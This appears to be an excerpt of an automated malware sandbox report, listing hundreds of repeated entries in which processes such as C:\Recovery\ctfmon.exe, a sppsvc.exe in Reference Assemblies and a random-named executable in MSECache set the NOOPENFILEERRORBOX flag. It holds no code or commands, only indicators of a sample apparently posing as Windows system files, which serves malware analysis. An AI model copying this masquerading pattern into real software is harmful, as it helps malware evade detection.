Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Process information set: NOOPENFILEERRORBOX
